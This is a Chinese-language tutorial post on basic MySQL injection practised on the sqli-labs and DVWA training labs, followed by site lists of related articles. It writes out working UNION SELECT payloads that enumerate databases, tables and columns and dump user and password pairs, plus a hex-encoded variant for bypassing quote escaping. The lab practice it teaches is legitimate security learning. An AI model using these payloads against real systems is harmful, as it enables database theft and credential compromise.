数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始：简单获取基础内容

第一步，使用拼接的方式决定注入类型

MySQL注入基础练习

第二部，使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步，使用union select 来找到内容，获取想要得到内容

union select ：联合查询

MySQL注入基础练习

进阶，通过mysql注入获取表单内容，托库；

第一步：通过数据库语句进行搜索，首先确定数据库

MySQL注入基础练习

第二部：确定数据库后，爆出它的表；

MySQL注入基础练习

第三步：确定表以后，可根据实际需求爆表，这里以users举例，进行爆字段

MySQL注入基础练习

第四部：确定字段后，我们就可以拖库；

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后，爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后，爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后，进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同，没有输入框，只有选择项，所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文：暴库

MySQL注入基础练习

爆表

ps：因为后台强制转译的问题，要注意避免单引号

MySQL注入基础练习

爆字段

同爆表，因为转译的问题，要注意避免引号，可使用编译规避；

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

- Author -

纪迁辰

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐

MySQL之高可用集群部署及故障切换实现

Apr 22 MySQL

MySQL查询学习之基础查询操作

May 08 MySQL

为什么MySQL分页用limit会越来越慢

Jul 25 MySQL

SQL实现LeetCode(177.第N高薪水)

Aug 04 MySQL

MySQL的全局锁和表级锁的具体使用

Aug 23 MySQL

浅谈MySQL中的六种日志

Mar 23 MySQL

Mysql使用全文索引(FullText index)的实例代码

Apr 03 MySQL

详解Mysql数据库平滑扩容解决高并发和大数据量问题

May 25 MySQL

MySQL运行报错:“Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggre”解决方法

Jun 14 MySQL

MySQL事务的隔离级别详情

Jul 15 MySQL

mysql数据库如何转移到oracle

Dec 24 MySQL

解决Navicat for MySQL 连接 MySQL 报2005错误的问题

MYSQL(电话号码,身份证)数据脱敏的实现

May 28 #MySQL

MySql开发之自动同步表结构

mysql升级到5.7时,wordpress导数据报错1067的问题

May 27 #MySQL

解决Navicat for Mysql连接报错1251的问题(连接失败)

Navicat for MySQL的使用教程详解

MySQL Router实现MySQL的读写分离的方法

You might like

用PHP控制用户的浏览器--ob*函数的使用说明

2007/03/16 PHP

php中常用的预定义变量小结

2012/05/09 PHP

javascript确认框的三种使用方法

2013/12/17 Javascript

浅析IE10兼容性问题(frameset的cols属性)

2014/01/03 Javascript

使用cluster 将自己的Node服务器扩展为多线程服务器

2014/11/10 Javascript

3种Jquery限制文本框只能输入数字字母的方法

2014/12/03 Javascript

JS 作用域与作用域链详解

2015/04/07 Javascript

JavaScript中常见的字符串操作函数及用法汇总

2015/05/04 Javascript

Javascript验证Visa和MasterCard信用卡号的方法

2015/07/27 Javascript

javascript日期处理函数，性能优化批处理

2015/09/06 Javascript

阿里巴巴技术文章分享 Javascript继承机制的实现

2016/01/14 Javascript

使用Jasmine和Karma对AngularJS页面程序进行测试

2016/03/05 Javascript

String字符串截取的四种方式总结

2016/11/28 Javascript

JS获取多维数组中相同键的值实现方法示例

2017/01/06 Javascript

浅谈pc端rem字体设置的问题

2017/08/03 Javascript

vue.js使用v-model实现表单元素(input) 双向数据绑定功能示例

2019/03/08 Javascript

Bootstarp在pycharm中的安装及简单的使用方法

2019/04/19 Javascript

layui监听select变化,以及设置radio选中的方法

2019/09/24 Javascript

vue-cli3 取消eslint校验代码的解决办法

2020/01/16 Javascript

[00:34]DOTA2上海特级锦标赛 Spirit战队宣传片

2016/03/04 DOTA

在Python中利用Into包整洁地进行数据迁移的教程

2015/03/30 Python

Flask配置Cors跨域的实现

2019/07/12 Python

OpenCV灰度化之后图片为绿色的解决

2020/12/01 Python

美国婚礼礼品网站：MyWeddingFavors

2018/09/26 全球购物

草莓网官网：StrawberryNET

2019/08/21 全球购物

美国滑板店：Tactics

2020/11/08 全球购物

机械专业毕业生自荐信

2013/11/02 职场文书

成功的餐厅经营创业计划书

2014/01/15 职场文书

敬老院标语

2014/06/27 职场文书

师德师风自我评价范文

2014/09/11 职场文书

学生实习证明范文

2014/09/28 职场文书

2014年实习班主任工作总结

2014/11/08 职场文书

六一文艺汇演开幕词

2015/01/29 职场文书

如何书写读后感？（附范文）

2019/07/26 职场文书

python基础之文件操作

2021/10/24 Python

Django框架中视图的用法

2022/06/10 Python